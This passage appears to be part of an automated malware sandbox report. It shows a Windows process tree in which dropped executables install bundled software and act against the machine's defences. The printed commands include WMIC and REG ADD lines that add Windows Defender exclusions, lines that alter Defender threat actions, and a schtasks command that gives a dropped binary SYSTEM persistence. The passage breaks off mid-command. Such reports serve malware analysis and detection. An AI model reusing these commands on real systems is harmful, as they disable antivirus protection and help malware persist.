                                                                                              • Checks BIOS information in registry
                                                                                              • Executes dropped EXE
                                                                                              • Checks whether UAC is enabled
                                                                                              • Drops file in System32 directory
                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                              PID:4760
                                                                                            • C:\Users\Admin\Pictures\ZVI5EtoLXtUqGb1ZbPy75lrd.exe
                                                                                              "C:\Users\Admin\Pictures\ZVI5EtoLXtUqGb1ZbPy75lrd.exe"
                                                                                              4⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:6392
                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS122B.tmp\Install.exe
                                                                                                .\Install.exe /nxdidQZJ "385118" /S
                                                                                                5⤵
                                                                                                • Checks BIOS information in registry
                                                                                                • Checks computer location settings
                                                                                                • Executes dropped EXE
                                                                                                • Enumerates system info in registry
                                                                                                PID:6996
                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                                                                  6⤵
                                                                                                    PID:5656
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                      7⤵
                                                                                                        PID:6888
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                          8⤵
                                                                                                            PID:7076
                                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                              9⤵
                                                                                                                PID:6672
                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                          schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 16:02:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\qdPZeLr.exe\" em /nIsite_idkOw 385118 /S" /V1 /F
                                                                                                          6⤵
                                                                                                          • Creates scheduled task(s)
                                                                                                          PID:4672
                                                                                                    • C:\Users\Admin\Pictures\PaB5QImLZ2zhRJV735jS8QA7.exe
                                                                                                      "C:\Users\Admin\Pictures\PaB5QImLZ2zhRJV735jS8QA7.exe" --silent --allusers=0
                                                                                                      4⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Loads dropped DLL
                                                                                                      • Enumerates connected drives
                                                                                                      PID:6616
                                                                                                      • C:\Users\Admin\Pictures\PaB5QImLZ2zhRJV735jS8QA7.exe
                                                                                                        C:\Users\Admin\Pictures\PaB5QImLZ2zhRJV735jS8QA7.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x298,0x29c,0x2a0,0x274,0x2a4,0x6b54e1d0,0x6b54e1dc,0x6b54e1e8
                                                                                                        5⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Loads dropped DLL
                                                                                                        PID:6728
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\PaB5QImLZ2zhRJV735jS8QA7.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\PaB5QImLZ2zhRJV735jS8QA7.exe" --version
                                                                                                        5⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Loads dropped DLL
                                                                                                        PID:6948
                                                                                                      • C:\Users\Admin\Pictures\PaB5QImLZ2zhRJV735jS8QA7.exe
                                                                                                        "C:\Users\Admin\Pictures\PaB5QImLZ2zhRJV735jS8QA7.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=6616 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240419160130" --session-guid=7247253c-7519-41e3-a6d3-022d7b3d6a06 --server-tracking-blob="Y2RmMTU4YzA2OWM3ZjQ4NDE3Y2QzNjAyMDRiZDI4MTc3YmFkYmI4ZDBiOWVlODdmMzc3ODhiMWI2ZTkzZjU4Njp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fNDU2Iiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTAiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzEzNTQyNDg1LjE2MjAiLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzQ1NiIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiYjU5ZDliYzctMDBjZi00NDBhLTk3NDgtMjkxYjhmZjVjMzgyIn0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=E803000000000000
                                                                                                        5⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Loads dropped DLL
                                                                                                        • Enumerates connected drives
                                                                                                        PID:7156
                                                                                                        • C:\Users\Admin\Pictures\PaB5QImLZ2zhRJV735jS8QA7.exe
                                                                                                          C:\Users\Admin\Pictures\PaB5QImLZ2zhRJV735jS8QA7.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x2a8,0x2ac,0x2b0,0x278,0x2b4,0x6a98e1d0,0x6a98e1dc,0x6a98e1e8
                                                                                                          6⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Loads dropped DLL
                                                                                                          PID:3992
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191601301\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191601301\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"
                                                                                                        5⤵
                                                                                                          PID:4952
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191601301\assistant\assistant_installer.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191601301\assistant\assistant_installer.exe" --version
                                                                                                          5⤵
                                                                                                            PID:6940
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191601301\assistant\assistant_installer.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191601301\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0xf26038,0xf26044,0xf26050
                                                                                                              6⤵
                                                                                                                PID:3204
                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
                                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                                                                                                          3⤵
                                                                                                            PID:1180
                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                          "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                                                                                                          2⤵
                                                                                                          • Blocklisted process makes network request
                                                                                                          • Loads dropped DLL
                                                                                                          PID:3956
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 5396 -ip 5396
                                                                                                        1⤵
                                                                                                          PID:5536
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                          1⤵
                                                                                                            PID:6288
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                            1⤵
                                                                                                              PID:6300
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 6244 -ip 6244
                                                                                                              1⤵
                                                                                                                PID:7120
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 5720 -ip 5720
                                                                                                                1⤵
                                                                                                                  PID:6604
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                  1⤵
                                                                                                                    PID:1612
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\qdPZeLr.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\qdPZeLr.exe em /nIsite_idkOw 385118 /S
                                                                                                                    1⤵
                                                                                                                      PID:7104
                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                        2⤵
                                                                                                                          PID:5552
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                            3⤵
                                                                                                                              PID:796
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                4⤵
                                                                                                                                  PID:1364
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                                3⤵
                                                                                                                                  PID:5216
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                                  3⤵
                                                                                                                                    PID:5588
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                                    3⤵
                                                                                                                                      PID:6888
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                                      3⤵
                                                                                                                                        PID:3452
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                                        3⤵
                                                                                                                                          PID:6344
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                                          3⤵
                                                                                                                                            PID:7140
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                            3⤵
                                                                                                                                              PID:6456
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                                              3⤵
                                                                                                                                                PID:6700
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                                3⤵
                                                                                                                                                  PID:4732
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                                  3⤵
                                                                                                                                                    PID:6568
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                                    3⤵
                                                                                                                                                      PID:5040
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                                                      3⤵
                                                                                                                                                        PID:5656
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                                        3⤵
                                                                                                                                                          PID:6980
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                                          3⤵
                                                                                                                                                            PID:6320
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                                            3⤵
                                                                                                                                                              PID:4040
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                              3⤵
                                                                                                                                                                PID:440
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:1528
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:4684
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:5220
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:3332
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:5216
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:4240
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:1636
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:6964
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:5108
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:3588
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:5176
                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                    powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows 